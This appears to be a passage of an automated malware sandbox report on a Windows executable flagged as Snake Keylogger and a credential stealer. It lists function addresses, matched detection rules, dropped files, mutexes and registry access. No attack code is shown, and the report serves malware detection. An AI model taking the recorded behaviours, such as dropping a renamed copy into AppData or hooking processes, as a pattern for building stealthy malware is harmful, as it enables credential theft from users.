Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_0325E97B	13_2_0325E97B
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_032529E0	13_2_032529E0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_03253E09	13_2_03253E09
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F82A90	13_2_06F82A90
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F89668	13_2_06F89668
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F81FA8	13_2_06F81FA8
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F81850	13_2_06F81850
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F89D90	13_2_06F89D90
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F85148	13_2_06F85148
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8DAC8	13_2_06F8DAC8
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8DAC7	13_2_06F8DAC7
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8D670	13_2_06F8D670
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8D663	13_2_06F8D663
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8D218	13_2_06F8D218
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8E7D0	13_2_06F8E7D0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8E7CF	13_2_06F8E7CF
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F81F9B	13_2_06F81F9B
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8E378	13_2_06F8E378
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8E36F	13_2_06F8E36F
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F80B30	13_2_06F80B30
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8DF20	13_2_06F8DF20
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F80B20	13_2_06F80B20
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8DF1F	13_2_06F8DF1F
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8F4D8	13_2_06F8F4D8
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F88CC0	13_2_06F88CC0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F88CB1	13_2_06F88CB1
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8F080	13_2_06F8F080
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8F071	13_2_06F8F071
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F89448	13_2_06F89448
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F80040	13_2_06F80040
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F81841	13_2_06F81841
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8EC28	13_2_06F8EC28
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F80006	13_2_06F80006
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8CDC0	13_2_06F8CDC0
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8CDAF	13_2_06F8CDAF
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F85138	13_2_06F85138
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8F930	13_2_06F8F930
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F89D29	13_2_06F89D29
Source: C:\Users\user\Desktop\7495 P.exe	Code function: 13_2_06F8F921	13_2_06F8F921
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B055B6	14_2_04B055B6
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B055B8	14_2_04B055B8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B031AC	14_2_04B031AC
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B0AB30	14_2_04B0AB30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B26278	14_2_04B26278
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_04B26268	14_2_04B26268
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_072C0040	14_2_072C0040
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_072CE790	14_2_072CE790
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_072CE32F	14_2_072CE32F
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_072C0022	14_2_072C0022
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 14_2_072CEBD8	14_2_072CEBD8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176C146	18_2_0176C146
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_01767118	18_2_01767118
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176A088	18_2_0176A088
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_01765370	18_2_01765370
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176D278	18_2_0176D278
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176C468	18_2_0176C468
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176C738	18_2_0176C738
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_017669A0	18_2_017669A0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176E988	18_2_0176E988
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_01763B87	18_2_01763B87
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176CA08	18_2_0176CA08
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176CCD8	18_2_0176CCD8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176CFAB	18_2_0176CFAB
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176E97B	18_2_0176E97B
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_0176F961	18_2_0176F961
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_017629EC	18_2_017629EC
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_01763AA1	18_2_01763AA1
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_01763E09	18_2_01763E09
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF9668	18_2_06DF9668
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF1FA8	18_2_06DF1FA8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF9D38	18_2_06DF9D38
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF2A90	18_2_06DF2A90
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF1850	18_2_06DF1850
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF5148	18_2_06DF5148
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFD670	18_2_06DFD670
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFD660	18_2_06DFD660
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFE7D0	18_2_06DFE7D0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFE7CE	18_2_06DFE7CE
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF1FA1	18_2_06DF1FA1
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFDF1E	18_2_06DFDF1E
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFDF20	18_2_06DFDF20
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFF4D8	18_2_06DFF4D8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF8CC0	18_2_06DF8CC0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFEC18	18_2_06DFEC18
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFEC28	18_2_06DFEC28
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFCDC0	18_2_06DFCDC0
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFDAC8	18_2_06DFDAC8
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFDAB9	18_2_06DFDAB9
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFD218	18_2_06DFD218
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFE378	18_2_06DFE378
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFE369	18_2_06DFE369
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF0B30	18_2_06DF0B30
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF0B20	18_2_06DF0B20
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFF080	18_2_06DFF080
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF1841	18_2_06DF1841
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF0040	18_2_06DF0040
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFF071	18_2_06DFF071
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF0007	18_2_06DF0007
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DF5143	18_2_06DF5143
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFF930	18_2_06DFF930
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Code function: 18_2_06DFF921	18_2_06DFF921

Source: 7495 P.exe, 00000002.00000002.1340523019.0000000003104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000002.1345958521.00000000084A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000002.1339095430.00000000011BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000002.1340523019.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000002.1345017563.00000000078FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQPNc.exe4 vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000002.1344806688.0000000007860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs 7495 P.exe
Source: 7495 P.exe, 00000002.00000000.1274186088.0000000000A6E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQPNc.exe4 vs 7495 P.exe
Source: 7495 P.exe, 0000000D.00000002.3727840709.0000000001357000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 7495 P.exe
Source: 7495 P.exe	Binary or memory string: OriginalFilenameQPNc.exe4 vs 7495 P.exe

Source: 7495 P.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.7495 P.exe.47d0650.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.7495 P.exe.478c830.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.HRrXXnBIpL.exe.3e81ca0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.HRrXXnBIpL.exe.3e3de80.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.7495 P.exe.478c830.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000D.00000002.3727170925.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1341717853.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.1378937276.0000000003E3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 7495 P.exe PID: 5272, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 7495 P.exe PID: 8812, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: HRrXXnBIpL.exe PID: 8888, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 7495 P.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HRrXXnBIpL.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 2.2.7495 P.exe.478c830.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.7495 P.exe.478c830.1.raw.unpack, J.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.7495 P.exe.478c830.1.raw.unpack, J.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, J.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.7495 P.exe.47d0650.2.raw.unpack, J.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, aMu2NOYwqVRQXxSL3P.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, aMu2NOYwqVRQXxSL3P.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4

Source: C:\Users\user\Desktop\7495 P.exe

File created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Mutant created: \Sessions\1\BaseNamedObjects\tNIdRWNgGDwLnbxDBfODao
Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8656:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:120:WilError_03

Source: C:\Users\user\Desktop\7495 P.exe

File created: C:\Users\user\AppData\Local\Temp\tmp843E.tmp

Jump to behavior

Source: 7495 P.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 7495 P.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\7495 P.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\7495 P.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 7495 P.exe, 0000000D.00000002.3730302031.0000000003545000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003512000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003552000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003520000.00000004.00000800.00020000.00000000.sdmp, 7495 P.exe, 0000000D.00000002.3730302031.0000000003502000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.000000000338E000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000033D2000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.000000000339E000.00000004.00000800.00020000.00000000.sdmp, HRrXXnBIpL.exe, 00000012.00000002.3730425071.00000000033AC000.00000004.00000800.00020000.00000000.sdmp

